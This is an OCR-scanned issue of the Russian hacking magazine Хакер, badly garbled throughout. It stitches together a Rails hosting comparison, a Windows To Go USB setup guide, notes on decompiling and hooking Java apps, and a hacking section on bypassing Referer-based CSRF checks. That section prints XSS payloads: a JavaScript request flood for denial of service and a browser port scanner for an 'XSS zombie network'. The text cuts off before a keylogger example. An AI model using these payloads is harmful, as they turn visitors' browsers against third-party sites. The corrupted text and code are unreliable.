поэтому поддержка Ра Из там должна быть 



на высоте. ѴР5, кстати, заточен в частности 
под Раііз 3. Цены за ѴР5 весьма привлека- 
тельные. Доступна оплата электронными 
деньгами, принимаются ѴѴеЬМопеу и Яндекс. 
Деньги. Это все прекрасно, но вот облаков у 
І_осит нет. 

ВЫВОДЫ: хорошо подходит для малобюджет- 
ного Раііз-проекта. 




МеЛіа Тетріе 



Сайт: ппебіаіеппріе.пеі 

Тип: помесь ѴйБ и РааБ 

Тест скорости: ЫЕІѵ/бОБВУб 

Хостинг Мебіа Тетріе — это почти облако. 

Он работает как система преднастроенных 
контейнеров. В свое время у Мебіа Тетріе 
был контейнер для Раііз, но, к сожалению, они 
прекратили его поддерживать. Зато в наличии 
контейнер для МуБСіБ с автомасштабировани- 
ем, что пригодится, когда возникнет необхо- 



димость расширяться (существует, однако, 
мнение, что 50Б БД не масштабируется по- 
человечески). На Хабрахабре про Мебіа Тетріе 
говорят, что это решение, конечно, дорогое, 
но очень надежное. Также можно отметить 
хорошую скорость реакции поддержки: когда 
я написал письмо с вопросом про Раііз 3, ответ 
пришел через час. 

ВЫВОДЫ: система контейнеров выглядит 
классно, но нет поддержки Раііз, и поэтому 




надо брать ѴйБ за 50 долларов, что дороговато 
для старта. 



ЕСЛИ ПЕРЕД ТОБОЙ СТОИТ ВЫБОР, ГДЕ РАЗМЕСТИТЬ САЙТ, 
ТО Я ПОПРОБУЮ ПОМОЧЬ ТЕБЕ ОПРЕДЕЛИТЬСЯ. 
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Епдіпе ѴагсІ 



Сайт: ѵѵѵѵѵѵ.епаіпеѵагсі.сот 

Тип: Раа5 

Тест скорости: ЬИ.Іу/НУУОЬи 

Епдіпе УагсІ — это хостинг очень высокого 
уровня. Он поможет вам во всем, вплоть до 
анализа вашего кода. Известен тем, что дает 
работу знаменитым в мире РиЬу людям: Ехуде 
Кацу, разработчику Раііз, Эвану Фениксу, раз- 
работчику альтернативной РиЬу-реализации 
ПиЫпиз, а также тем, что поддерживал ветку 
РиЬу 1.8 и спонсировал ЭРиЬу. Судя по много- 
численным отзывам, важная черта Епдіпе УагсІ 
— высокая надежность благодаря продуман- 
ной конфигурации. Наверное, ты не удивишь- 



ся, узнав, что он базируется на инфраструктуре 
Атагоп. У Епдіпе УагсІ похожая на Негоки удоб- 
ная система дополнений. Продолжая аналогию 
с Негоки, отметим, что и в случае Епдіпе УагсІ у 
тебя есть возможность сэкономить на систем- 
ном администраторе, а учитывая их обещания 
глубоко погрузиться в твои проблемы, то и на 
программистах. Если Негоки — это удобный 
супермаркет самообслуживания, то Епдіпе 
Уагб — это бутик с приветливыми и квалифи- 
цированными консультантами. К сожалению, 
минимальная цена за все это счастье — 80 
долларов в месяц, и даже 500 часов бесплат- 
ной работы, которые предоставляет Епдіпе 
УагсІ, нас вряд ли спасут. 




ВЫВОДЫ: Раііз-хостинг премиум-класса. 
Если ты хочешь обслуживание очень высоко- 
го уровня от настоящих профессионалов, то 
тебе сюда. 



Атагоп ѴѴеЬ Зегѵісев 



Сайт: аѵѵз.атагоп.сот 

Тип: ІааБ 

Тест скорости: ЬіЕІѵ/Э29КСѴ 

Атагоп знают все. Это первопроходцы об- 
лачного хостинга, о которых мы рассказы- 
вали не раз (втом числе в прошлом номере 
в статье «Ханипот на Атагоп»). Сервис 
предлагает целый стек технологий, пред- 
ставляющий собой гибкий конструктор для 
сборки собственного кластера. Это настоя- 
щее облако от зубров этого дела: тут есть 
и инструменты для поднятия произвольного 
количества инстансов и хранения файлов, 



и баллансировщик, и масштабируемая 
база данных. К сожалению, такая универ- 
сальность увеличивает сложность старта: 
придется немного покорпеть, чтобы освоить 
нужные технологии. Зато экспериментиро- 
вать до определенного момента по ресурсам 
можно бесплатно. АѴѴ5 считается высоко- 
надежным сервисом, но и на старуху бывает 
проруха: в 201 1 году хостинг из-за одной 
многочасовой аварии превысил пределы, 
допустимые его 5І_А. 

ВЫВОДЫ: высокий уровень гибкости и на- 
дежности по неплохим ценам, но приго- 







товьтесь к долгой настройке. Подходит тем, 
кто не хочет платить целый год, но готов 
тратить время на особенности Атагоп ѴѴеЬ 
Бегѵісез. 



Ыпосіе 



Сайт: ѵѵѵѵѵѵ.Ііпосіе.сот 

Тип: Ѵй5 

Тест скорости: ЫЫу/НУК)ТЗ 

На Хабрахабре в топике, посвященном вы- 
бору хостинга, Ыпосіе получил абсолютное 
большинство зрительских симпатий. Все 
отзывы на І_іпосіе, которые я находил, были 
исключительно положительные. Основной 
плюс, который отмечают все, — это 100%-я 
доступность сервера и ни минуты простоя за 
несколько лет. Помимо высочайшей надеж- 
ности радует также и производительность 
серверов. Эйвинд Уггедал в своем широко 



цитируемом сравнении производительности 
ѴР5 ( Ы{.1у/6Мз8ЬВ ) выставляет наивысший 
балл именно хостингу Ыпосіе (среди кон- 
курентов — Атагоп и Раскзрасе), отмечая 
превосходное соотношение цены и качества. 
Всего у Ыпосіе шесть дата-центров, некото- 
рые расположены в Европе, что уменьшает 
задержку при работе из России. Если же тебя 
интересует, как обстоят дела с техподдерж- 
кой, то и тут все хорошо. Коллеги утвержда- 
ли, что часто ответ приходит в течение 5-10 
минут. Все вышесказанное делает Ыпосіе 
не очень дорогим, но очень качественным 
«необлаком». 




ВЫВОДЫ: отличная Ѵй5 по разумным ценам, 
выбор ИТ-специалистов. 



5ЕВѴІСЕ І.ЕѴЕІ. А6ВЕЕМЕЫТ (5І_А) 



Соглашение об уровне предоставления 
услуги — термин, обозначающий формальный 
договор между заказчиком услуги и ее 



поставщиком, содержащий описание 
услуги, права и обязанности сторон и, самое 
главное, согласованный уровень качества 



предоставления данной услуги. В контексте 
хостинга, это в первую очередь гарантируемый 
процент среднего времени работы в год (ирііте). 
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Рельсы в облаках 



$егѵег4уои 



Сайт: ѵѵѵѵѵѵ.5егѵег4ѵои.сопп 

Тип: ѴйБ 

Тест скорости: ЬИ.1у/НУНд02 

Немецкий хостинг-провайдер с удивительно 
низкой базовой стоимостью ѴйБ с 1 Гб РАМ (15 
долларов). Это самое дешевое предложение, 
которое мне удалось найти. Из минусов от- 
метим тот факт, что гарантированный аптайм 
только лишь 99% (а это, прошу заметить, 



90 часов простоя в год) и, судя по отзывам, 
адекватная техподдержка доступна только в 
будние дни в рабочее время. Также неприятно 
то, что для не немецкого клиента оплата до- 
ступна минимум за полугодовую аренду. 

ВЫВОДЫ: очень дешевый европейский сервер 
с приличным каналом до России. Подходит 
только для некритичных к времени непрерыв- 
ной работы проектов. 




ВЫВОДЫ 

В области хостинга только ленивый или очень 
честный не пишет слово сіоиб в описании 
своих услуг. Подчас сіоиб — это старый до- 
брый ѴйБ в новой упаковке, как у ѵБЕРѴЕР 
Сіоиб от компании зегѵег4уои, или это «об- 
лачное решение», до боли похожее на ѴйБ с 
оплатой трафика, как в случае с Раскзрасе. 

В другой раз это может быть честное облако, 
как, например, у СІобо с оплатой за потре- 
бленное процессорное время и память (объем 
потребления которой меняется в зависимости 
от нагрузок), или настоящее РааБ-решение 
Негоки, позволяющее с помощью готового 
скрипта автоматически масштабировать 
количество используемых бупо (вычислитель- 
ных единиц Негоки) и полностью абстраги- 
роваться от понятия сервер в классическом 
смысле с операционной системой и веб- 
сервером, которые ты вынужден настраивать 



и обслуживать самостоятельно. Сегодня 
облачные решения стремительно множатся. 

В России еще недавно нельзя было найти 
ни одного настоящего облачного хостинг- 
провайдера, а сейчас уже можно насчитать 
почти два десятка: СІоибопе, СІобо, Сіоиб 4У, 
ІТ-дгаб, ІТ-ІіІе, Рагкіпд, Беіесіеі, Асііѵесіоиб, 
ІБРзегѵег, ІІпі-сІоиб, Сгос, I пГоЬох, Оѵегзип, 
Оаіаііпе, БоЙІіпе, Іпоѵепііса. Если смотреть 
за пределы родины, то нет уверенности, что 
объема статьи хватит для перечисления всех 
сервисов такого типа. Именно поэтому мы 
были вынуждены остановиться на ограничен- 
ном круге компаний. Мы старались охватить 
полный спектр предоставляемых решений от 
бюджетных ѴР5 до РааБ-решений премиум- 
класса. 

Что конкретно выберет для себя читатель, 
зависит только от его задач. Если ему нужно 
сверхдешевое решение, то можно присмо- 



треться к ѴР5 от І_осит или постараться 
уложиться в бесплатные лимиты от Атагоп. 
Если есть желание насладиться высокотехно- 
логической платформой, сделанной РиЬу- 
разработчиками для РиЬу-разработчиков, 
то рекомендую обратить внимание на Негоки 
(благо на старте даже Негоки может быть бес- 
платным). Кроме того, этот хостинг может по- 
мочьздорово сэкономить на системном адми- 
нистраторе. Если хочется полного контроля, 
высокой скорости доступа, маленького пинга 
и честного облака, то тебе подойдет СІобо. 
Если для тебя на первом месте сумасшедшая 
надежность и фанатичная техподдержка 
по приемлемым ценам, то твой выбор — 
Раскзрасе. Если же тебя не пугает отсутствие 
слова «облако» в названии услуги, то тебе 
могут подойти серверы компании Ыпобе. В 
любом случае выбор за тобой, а он, как ты мог 
убедиться, у тебя есть. □С 



1 1 


ТИП ХОСТИНГА 

■ 


ЦЕНА [ЗА МЕСЯЦ) 


БЕСПЛАТНЫЙ ВАРИАНТ 


ТЕСТ СКОРОСТИ 
ПО РОССИИ 


ТЕСТ СКОРОСТИ 
ПО МИРУ 


ІСЬ.ги 


ѴР5, ѴйБ 


192 Мб, 5 Гб— 120 руб. 
768 Мб, 20 Гб — 490 руб. 


10 дней 


0,1 с. 


0,85 с. 


І_осит 


ѴР5, ѴйБ 


ѴР5: 150 руб. 

ѴВБ: 512 Мб, 15 Гб — 800 руб. 


14 дней 


0,8 с. 


0,04 с. 


СІобо 


ѴйБ, ІааБ 


ѴйБ 256 Мб, 5 Гб — 232 руб. 
ІааБ — 300 руб. 


Отсутствует 


0,01 с. 


0,34 с. 


РаскзрасеСІоиб 


среднее между і 
ѴОБиІааБ 


256 Мб, 10 Гб — 325 руб. 
512 Мб, 20 Гб — 645 руб. 


25 дней 


0,7 с. 


0,56 с. 


Мебіаіетріе 


помесь ѴйБ 
и РааБ 


ѴйБ 512МВ, 300В — 1480 руб. 
контейнер МуБСіЫ 128 Мб — 590 руб. 


Возврат денег, 30 дней 


0,75 с. 


0,64 с. 


Негоки 


РааБ 


один бупо и 20 Гб БД — 440 руб. 


750 часов работы бупо в месяц 
и 5 Мб БД 


0,6 с. 


0,43 с. 


ЕпдіпеУагб 


РааБ 


1,7 Гб, 160 Гб — от 2550 руб. 


500 часов работы 


1с, МСК — 0,5 с., 
СПБ — 2с. 


0,6 с. 


Атагоп ѴѴеЬ 
Бегѵісез 


ІааБ 


Тариф тісго 470 руб. 


Новым пользователям 
750 часов в месяц бесплатно 
в течение года 


0,55 с. 


0,52 с. 


Ыпобе 


ѴйБ 


512 Мб, 20 Гб — 590 руб. 


Возврат денег, неделя 


0,6 с. 


0,42 с. 


5егѵег4уои 


ѴРБ 


1 Гб, 25 Гб — 440 руб. 


Отсутствует 


0,65 с. 


0,47 с. 



Сравнение хостингов по типу, цене и времени доступа. Если в графе «Цена» стоит два однотипных показателя (например, две цены за ѴйБ), то это минимальная и комфортная 
конфигурация. Если однозначение — указывалась минимальная конфигурация 
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Мария «МИгіІІ» Нефедова (тіІИІІІсІгеаІ. хакер. ги) 




ДЕЛАЕМ ФЛЕШКУ С ЗАГРУЗОЧНОЙ ѴѴІЫ00ѴѴ5 8 НА БОРТУ 



Как запустить ѴѴіпсіоѵѵб с флешки? Раньше для этого пришлось бы порядком заморочиться 
и все равно получить костыльный вариант. Теперь такой режим доступен из коробки 
и называется ѴѴіпсІоѵѵз То 6о. Чем не повод попробовать «восьмерку»? 



так, одно из прикольных нововведений ѴѴіпсіоѵѵб 8 — это 
возможность загрузки ОС с ІІ5В-носителя. Фишка, в 
общем, давно известная как в стане Ыпих-пользователей, 
где такая практика распространена повсеместно, так и среди ги- 
ков, умудряющихся делать загрузочную флешку с ѴѴіпсІоѵѵз на борту 
(читай статью «ѴѴіпсІоѵѵз 7 РогІаЫе», Ьіі.Іу/КерІВу ). Приятно, что в 
случае с «восьмеркой» больше не нужно особых шаманств: об этом 
наконец-то подумал МісгозоЙ. Зачем загрузка с флешки может 
понадобиться? Ну хотя бы для того, чтобы попробовать в действии 
новую ОС, не рискуя навредить своей основной системе. Да и 
если ты сидишь на І_іпих или Мае 05 X, всегда приятно запустить 
винду — мало ли какая ситуация бывает. Короче говоря, режиму 
«ѴѴіпсІоѵѵз То 6о» — быть! 




ЧТО НАМ ПОНАДОБИТСЯ? 

Чтобы попробовать подобный финт в действии, потребуется не- 
сколько вещей: 




Рабочая винда 



• компьютер с уже установленной на нем ѴѴіпсІоѵѵз 7 или, не удив- 
ляйся, ѴѴіпсІоѵѵз 8 Ьеіа; 

• 150-образ ѴѴіпсіоѵѵз 8 СопзитегРгеѵіеѵѵ (32-битная версия), кото- 
рый предлагается всем абсолютно бесплатно ( ЬіСІѵ/І4НСѵЛ : 

• набор инструментов ѴѴіпсІоѵѵз Аиіотаіесі Іпзіаііаііоп Кіі ( ЬіСІѵ/ 

ІШМ2); 

• и немаленький ІІ5В- накопитель: нужно не менее 16 Гб. 

Подробнее хочу сказать по поводу последнего пункта. Сама 
ѴѴіпсІоѵѵз 8, конечно, не потребует 16 Гб места, однако, если 
создавать рабочий образ, включающий в себя МісгозоЙ ОІТісе и 
другие приложения для работы, без вместительного накопителя 
не обойтись. ѴѴіпсІоѵѵз Іо Со также потребуется пространство для 
временных файлов, свопов и так далее. Словом, лучше выбрать 
драйв пообъемнее. И желательно побыстрее: особенно круто, если 
машина и носитель будут работать через 115В 3.0. 

ПОДГОТАВЛИВАЕМ ФЛЕШКУ 

Для начала нам нужно приготовить флешку к работе: создать 
загрузочный сектор и отформатировать устройство в ІЧТР5. Для 
этого запускаем командную строку с правами администратора и 
выполняем следующие операции: 

1. Набираем команду 0І5КРАРТ, запускающуюутилиту для работы 
с дисковыми разделами. После 0І5КРАРТ пишем І_І5Т. Смотрим 
список дисков и запоминаем, под каким номером в нашей опера- 
ционной системе идет наша флешка. Например, это йізк 1. 

2 . Далее создаем загрузочный сектор и форматируем флешку. Если 
наша флешка была определена какОізк 1, то в качестве параме- 
тра для команды 5Е1_ЕСТ указываем йізк 1. Главное, не пере- 
путать диски и ненароком не отформатировать раздел на НОй :). 
Последовательно набираем команды: 
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ѴѴіпсІоѵѵз То 6о 



5ЕІ.ЕСТ ЭІ5К 1 
СЦЕАІМ 

СКЕАТЕ РАКТІТІОІМ РКІМАКѴ 
РОКМАТ Р5=І\ІТР5 

// Или РОКМАТ Р5=ІМТР5 ОШСК 
ЕХІТ 



Теперь флешку можно временно отложить в сторону. Займемся 
подготовкой образа ОС. 

ПОДГОТАВЛИВАЕМ ОБРАЗ 

1. Вначале нужно извлечь файлы из образа ѴѴіпсІоѵѵз 8 Сопзштіег 
Ргеѵіеѵѵ. Будешь литы его записывать на диск, воспользуешься 
утилитой для просмотра 150'шек (вроде Роѵѵегізо) или примонти- 
руешь как виртуальный привод (например, с помощью БАЕМ О N 
Тооіз Ыіе) — неважно. В папке\зоигсез необходимо будет найти 
файл іпзіаіі.ѵѵіт и скопировать его себе на жесткий диск. Это 
главное. 

2 . Далее вдело вступает набор ѴѴіпсІоѵѵз АІК, который содержит 
целый ряд инструментов для создания образов ѴѴіпсІоѵѵз, но 
для нашейтекущейзадачи нам потребуется только один из них 
— ітадех.ехе. С его помощью мы развернем образ ѴѴіпсІоѵѵз 8 в 
режиме ѴѴіпсІоѵѵз То Со из ѵѵіт-файла на нашу флешку. 

3. АІКсодержиттри версии ітадех.ехе — для каждой архитектуры 
(32-битну ю дл я х86 и две 64-битные для Іпіеі и АМР). Выбираем 
ітадех.ехе той же версии ОС, какая работает у нас на десктопе, и 
копируем ітадех.ехе в туже папку, куда ранее поместили файл 
іпзіаіі.ѵѵіт (у меня это С :\ѵѵі попазііск) . 

РАЗВОРАЧИВАЕМ ѴѴШ0ѴѴ5 ТО 60 НА ІІ5В-ДРАЙВ 

1. Смотрим, под какой буквой в системе значится наше 115В- 
устройство (в моем случаеэто й). Снова запускаем командную 
строку с правами администратора и изменяем директорию на ту, 
в которойу наслежатфайлы іпзіаіі.ѵѵіт и ітадех.ехе. 

2 . Вводим команду ітадех.ехе/арріу іпзіаіі.ѵѵіт 1 сІ:\ (или другую 
букву, если флешка значится в системе не под л итерой й). До- 
жидаемся окончания операции, в зависимости от скорости и типа 
115В -накопителя время выполнения может быть от 15 минут до 

2 часов. 115В -диски показывают лучшую производительность, 
нежели ІІ5В-флеш. 

3. Затем вводим команду С:>рготрЕ ЬссІЬооЕехесіЛѵѵіпсІоѵѵз/зсЕД 
АН, где й, как и в предыдущей команде, — буква, назначенная 
создан ному разделу. Эта команда записывает на у казанный раз- 
дел загрузчик, что позволит системе стартовать с него. 

Воти все,теперьты гордый обладательфлешки с ѴѴіпсІоѵѵз Іо Со на 
борту! 

ПОСЛЕ ЗАПУСКА 

Можно перезагрузить комп и включить в ВІ05 загрузку с ІІ5В-драйва. 
Дожидаемся обнаружения всех устройств, конфигурируем ѴѴіпсІоѵѵз 8 
на флешке. Система произведет поискустройств, запросит ключ (его 
выдает МісгозоК, когда ты загружаешь 150-образ ѴѴіпсІоѵѵз 8), создаст 
учетную запись пользователя и произведет начальную настройку 
окружения пользователя. Также устанавливаются обновления и драй- 
веры, причем не только для текущей машины, но и для других ПК, на 
которых тебе, вероятно, придется работать и использовать получен- 
ную портабельную ѴѴіпсІоѵѵз 8. К слову, по этим причинам для первого 
запуска лучше выбирать стабильную и современную машину. К приме- 
ру, мы провели первый запуск на старом ноутбуке и в итоге получили 
«вшитое» разрешение экрана 1024x768. С этим, конечно, можно 
смириться, если старый ноутбук — единственная машина, на которой 
ты собираешься работать, но если нет, лучше все-таки осуществить 
первый запуск на железе посовременнее. Далее работа ѴѴіпсІоѵѵз 8 
(при загрузке с 115В на том же ПК) будет аналогична работе обычной 
ѴѴіпсІоѵѵз 8, загружаемой с локального диска. Если загрузить ѴѴіпсІоѵѵз 8 
с такого ІІ5В-устройства на другом ПК, то ѴѴіпсІоѵѵз Іо 6о начнет работу 
с обнаружения устройств, что займет около 3-5 минут. И-Е 



за А^тілііііГімх: СѴкѴі Щ&па.*** - ІЗДші 



ІЛККІ*ЯІІ[> Ес-Іесі. ВІІИ 2 

БіеІ; Я іш зііі«Л-і> 4 4ііік. 

НІЕКРЛКТѴ Еіглгъ 

ЬіЕ ІиССек-іЬЛ ІА СІЛМІІПр Ё }н- ііхіі . 

р I ЯЫР-Д-КТ 5* Раьч ^ М пп. Рѵ-Ііыгу 

[' I Е ЬРарЛ Еи^ц-гшІиіІ (п ІПАІІМЧ Ё Ъч сучв-іНт^ ил гЧ. и І,ІІ II , 

РІДОРПРП Е#і«еі Г-йгтііісі» I 

ГлгІІІІиІі 1 и ІІВгѴ ІІш а 4ш 1. Кз Й ! ■ іі улл-Ь 1Ь Іим . 

НИМИ» Йсіі™ 

■ і З-.Нл г і п и і ■ л, г 1 1 I Кл еіігзтіъЕ рпгІ.эЕзпп із лгК. Енп. 

ЫіКРЯ&Г > Рарме К -НТЯ Оіі і і. к 

ЕЙК и ^г.і г плрі і? г рП 

І'і;>.|лгЬ -иг. Ц,*-. ;і'м | |\і |‘ и іті.і I. Е.Ч іі і|«ч ѴР ІШН , 

РІІХРПР.Г? Піэі^-гі 

Еы4ь*ІЬІ II 1 І;л Ь Ііи Ягіѵи ТгІВ-г В (Г «М-йі-Ь 



Создаем раздел на накопителе 

иш«<тіів№г4ані^ ШМ 







Сеіііпд сіеѵісеі кеасіу 3% 



Загружаем флешку 
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Алексей «Эгеепйод» Тюрин, ОідііаІ Бесигііу (іѵѵіНег.сот/апІуигіп) 




РАСКОВЫРЯТЬ МѴА-ПРИЛОЖЕНИЕ 



ЗАДАЧА 



РЕШЕНИЕ 

На сегодняшний день Заѵа является одним из самых распростра- 
ненных языков программирования. А потому очень часто появ- 
ляется необходимость ломать клиентские или серверные части 
Заѵа-приложений. Одним из главных плюсов Заѵа является, конечно 
же, ее кроссплатформенность. Программы на Заѵа по своей сути 
представляют байт-код, который и исполняется уже на конкретных 
виртуальных машинах, привязанных к платформе. Кроме этого, Заѵа 
предоставляет своим юзерам несколько больших плюсов с точки 
зрения безопасности. Например, неподверженность всевозможным 
переполнениям. Или малая вероятность 5СП_-инъекций благодаря 
повсеместному использованию параметризации запросов в СУБД. 
Однако эта платформа дает один бонус и для атакующего. Ведь если 
мы получим само приложение, у нас есть возможность декомпили- 
ровать его и работать уже с исходниками. А это, согласись, очень 
приятно. Почти ѵѵЫ*е Ьох :]. Так как изложенная выше теория обще- 
известна, то я сконцентрируюсь на практической части. 

Для начала давай определимся с декомпилятором. На самом деле 
их очень много. Моим любимым декомпилятором является № Раѵа 
йесотрііег, іаѵа.сІесотріІег.ІтееТг ). который, наряду с адекватностью 
работы, обладает одним главным достоинством — он бесплатен. 
Пользоваться тулзой крайне просто — указываешь необходимый 
для работы іа г, а затем смотришь на его внутренности. Исходники, 



конечно, — это хорошо. Но очень часто они бывают достаточно запу- 
танными, а ведь иногда хочется запустить приложение и посмотреть 
на него в действии, отслеживая каждый шаг «изнутри». Здесь можно 
увидеть некую аналогию с задачами как ОІІуйЬд, так и ЮА. Простей- 
ший пример — общение клиентского и серверного приложения с ис- 
пользованием какого-нибудь нестандартного шифрования. Конечно, 
мы можем по исходникам написать дешифратор или переделать само 
клиентское приложение, добавив необходимый функционал, но это 
излишние трудозатраты, если нам необходимо всего лишь повстав- 
лять кавычки и другие нехорошие символы. И как раз для этого нам 
пригодится программа ЗаѵаБпоор ( доо.д!/р4Л5 ), которая была пред- 
ставлена на конфе ВІаск На* в 2010 году компанией Азрес* 5есигі*у 
[ ѵѵѵѵѵѵ.азресізесигііѵ.сот ). Вот ее возможности вкратце: 

• перехватлюбыхметодов в виртуальной машине; 

• изменение параметров и возвращаемых значений; 

• внедрение произвольного кода в любой метод; 

• работа слюбыми Оаѵа-приложениями; 

• возможностьвнедрения в работающий процесс. 

То есть у нас появляется возможность практически полного 
контроля поведения ПО. Рекомендую посмотреть видео на этутему 
по ссылке: доо.дІ/02РЦг . 
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ЕА5У НАСК 



ОБОЙТИ ЗАЩИТУ ОТ С5КР, ОСНОВАННУЮ 
НА ПРОВЕРКЕ ЗАГОЛОВКА КЕРЕКЕК 



ЗАДАЧА 



РЕШЕНИЕ 

В прошлом номере мы говорили с тобой о С5РЕ-атаках, которые 
позволяли выполнять какое-то действие на сайте от имени поль- 
зователя. Одним из самых распространенных способов защиты 
от них, конечно же, являются необходимые для каждого запроса 
одноразовые токены. Но по разным причинам иногда их все-таки 
не используют. Еще один популярный способ защиты — проверка 
заголовка Реіюгег. Как известно, данный заголовок хранит в себе 
адрес страницы, с которой был инициализирован запрос на сайт. 
Таким образом, проверяя, что Реіюгег указывает на тот же домен, 
откуда был отправлен запрос, можно удостовериться, что это имен- 
но действие пользователя, а не итог СЗРЕ-атаки. Несмотря на свою 
распространенность, данный метод далеко не всегда поможет 
эффективно защитить НТМЕ-формы от атак злоумышленников. 

И сейчас мы узнаем, почему. Для начала давай рассмотрим ситуа- 
цию, когда поле Реіюгег отсутствует в НТТР-запросе. Такое бывает, 
когда пользователь самостоятельно вбил адрес страницы в брау- 
зере, то есть исходящий адрес страницы отсутствует. Получается, 
что приходящий запрос не может быть результатом С5РЕ. И это 
действительно так — на некоторых сайтах, если такой заголовок 
отсутствует или его значение указывает на тот же домен, запрос 
пропускается и операция успешно совершается. Но здесь есть один 
тонкий, но крайне важный нюанс, позволяющий воспользовать- 
ся данным попустительством. Поле Реіюгег не передается, если 
запрос производится с защищенного (НТТР5) на незащищенный 
(НТТР) ресурс. То есть, создав страничку с С5РЕ и поместив ее на 
своем сайте на НТТР5, злоумышленник сможет сделать так, что 
браузер жертвы не передаст Реіюгег во время запроса на атакуе- 
мый сайт. Также интересно то, что во время запроса с НТТР на 
НТТР5 поле Реіюгег вполне успешно передается. 

А что если пустой Реіюгег тоже недопустим? Тогда у нас в за- 
пасе есть еще один трюк. Связан он с такой прекрасной вещью, 
как редирект. Редиректы бывают разные, и многое зависит от 
ситуации. Иногда они реализуются в приложении/сайте, а иногда 
это итог настройки веб-сервера. Важно, чтобы мы могли хотя бы 




Переход с НТТР5 на НТТР, поле Ке^егег отсутствует 




Пример подделки НТТР-заголовка Ре^егег за счет редиректа 

частично контролировать конечную точку. Но общая идея такова: 
во-первых, находим редиректы на сайте, во-вторых, правильно 
подставляем наш С5РЕ в ссылку на редирект. Таким образом, ког- 
да пользователь зайдет на уязвимый сайт, то сначала попадет на 
редирект, а уже оттуда — на нужный линк с С5РЕ. Здесь понятно, 
что Реіюгег во втором запросе будет указывать на редирект, то 
есть на тот же домен. 



РАСШИРИТЬ ВЕКТОРЫ ПРИМЕНЕНИЯ ОБЫЧНОЙ Х55 



ЗАДАЧА 



РЕШЕНИЕ 

Мало кому известно, что, помимо стандартной кражи кукисов, 
С5РЕ и тому подобных детских шалостей, у обычной Х55- 
уязвимости есть масса других, не совсем стандартных областей 
применения. Специально для тебя наш постоянный автор Защаг 
Заізига ( іѵѵіиег.сот/защаг заізига ) решил поделиться некоторы- 
ми интересными векторами и концептами. Какты уже понял, все 
эти векторы активируются и принимаются за свою грязную работу 
просто при заходе пользователя на протрояненную страницу. 

1. ОйоЗ-атака. Злоумышленники могут использовать возмож- 
ности браузера для массированной распределенной атаки на 
отказ в обслуживании: 

^ипсЕіоп сісіозП I 

-Рог(і = 0 <1ѲѲ0^і++) { 

ѵаг -РиІІЦгІ = "ІтЕ'Ьр: //зі^е. сот" : 



ѵаг ІгЕІірКедиезІ: = пеы ХМЫ-ИіІірКедиезІіО ; 
ІтІ^рКедиезІі.орепС'еЕТ" , -РиІШгІ., Іггие) ; 
ІіІіІірКедие з Іі. опгеа сІ у зІіаІіе сІі ап^е = ігѵРоКе се і ѵе сІ ; 
ЫіІірКедиезІі.опеггог = егг; 

ІіІіІірКедиезІ: . зепс КпиІІП ; 

} 

-Ь- 



-РипсЕіоп іп-РоКесеіѵесІ(хт1Іі1:1:р) 

{ 

і-р (хтИтЫір. геас!у5'Еа'Ее==4Н 
зе1:Тітеои1:( ' сісі озО ; 1 , 1) ; 

} 

} 

В приведенном выше примере производится создание 1000 



ХАКЕР 06/161/2012 



049 







ВЗЛОМ/ ЕА5ѴНАСК 



пустых запросов (при этом максимальное количество созда- 
ваемых веб-сокетов для современных браузеров составляет 
что-то около 10 000 запросов в минуту] при помощи всем 
известной функции ХМиНирРецііезШ к сайту зііе.сот с целью 
тупого флуда веб-сервера. 

2. Рассылка спама. Здесь обойдемся без конкретных примеров, 
так как мы против спама. Однако ты можешь сам догадаться, что 
в этом деле потенциальному спамеру поможет все та же функция 
ХМШирРециезШ. 

3. Распределенные вычисления. Например, при помощи Х55 на 
каком-либо крупном ресурсе можно быстро и легко произвести 
рутинную и нудную работу, в ином случае занявшую бы очень 
долгое время: перебор портов, ІР-адресов, паролей, дирек- 
торий — вот далеко не полные возможности использования 
распределенных возможностей Х55 зомби -сети. Чтобы ты пред- 
ставил себе, насколько это эффективно, при веду та кой пример: 
одна жертва сканирует 65 000 портов за 6,5 секунды, то есть скан 
одного порта происходитза 0,1 секунды. Соответственно, если 

у хакера набралось 100 Х55-ботов, то скорость перебора этих же 
портов составитуже 0,065 секунды: 

Рог-ЕБсаппег = {}; 



// Функция скана портов 

Рог-ЕБсаппег . бсэпРогі: = -Рипсіііоп (саІІЬаск., 
іаг§е1:., рогЕ. 1=ітеои1=) 

{ 

ѵаг -Еітеоиі: = (-Еітеоиі: == пиіі) ?1ѲѲ: -Еітеоиі: ; 
ѵаг іт§ = пеш Іта^еО; 
іт^.опеггог = -Рипсіііоп О { 
і-р (!іт^) геііигп; 

іт§ = ипсіебпесі; 

саІІЬаскРііап^еІ:. рогЕ, ’ореп'); 

}; 

іт^.опіоасі = іт^.опеггог; 
іш^.бгс = ' Иіііір : / / ' + Ііаг^еі: + + ропі: ; 

зеІіТіте оиІ: (-Рипсіііоп П ( 
і-р ( ! іт§ ) геііигп; 
іт§ = ипсіебпесі; 

са!1Ьаск(1=ап^е1=. ропі. ' сІоБесГ); 

}, Ііітеоиіі V, 




Х55 в Віпд 




Пример ЦРІзрооНпд 



// Функция скана указанного хоста 

РогіБсаппег . БсапТаг^еІ: = -Рипсіііоп (саІІЬаск. 
1іап§е1і а _рог1і5_5І:г і -Еітеоиі:) 

і_ 

ѵаг рогЕ б = рогІіБ бЕг . 5р1і1і(" . ") ; 

-Рог (іпсіех = Ѳ; іпсіех < рогЕБ . Іеп^ЕЬ; іпс!ех++) { 
Роп-ЕБсаппеп. б сапРоп1і( саІІЬаск. Еаг§еЕ . 
рогЕБ [ іпсіех] . -Еітеоиі:): 

} 



// Функция старта перебора 
-Рипсіііоп бЕэгЕОІ 
ѵаг геБиІІ: = " " ; 



ѵаг саІІЬаск = ЕипсЕіоп ( Еаг^еЕ. рогЕ^БЕаЕиБ) { 
геБиГЕ = Еаг§еЕ + " : " + рогЕ + " " + БІіаІіиБ ; 
геЕигп ге5и1Е(ге5и1Е ісі. геБиІ-Е) ; 

}; 

РогЕБсаппег. б сапТаг§еЕ( саІІЬаск. 

"ТАК6ЕТ". "РОКТБ" . ТІМЕОІІТ) ; 

-Рог (ѵаг і=рогЕ_ро5; д<тах; 3++, роп1і_ро5++) { 
і~Р ( рог~Е_5~Е г != " ") рогЕ^БЕг += ' . ' ; 
рог-Е_5"Ег += рогЕ_агг[д ]; 



4. Кража персональных данных с помощью технологии кеузігокіпд 
(она же кеуіодд іпд или перехват нажатых клавиш). В большин- 
стве случаев реализуется встроенными функциями сіоситепі. 
опкеургезз, ипзаЕеѴѴіпсіоѵѵ.опкеургеББ, но из-затого, что это не 
работает в старых браузерных движках, ниже приводится не- 
многодругой примере возможностью записи даже в оффлайн- 
режиме: 
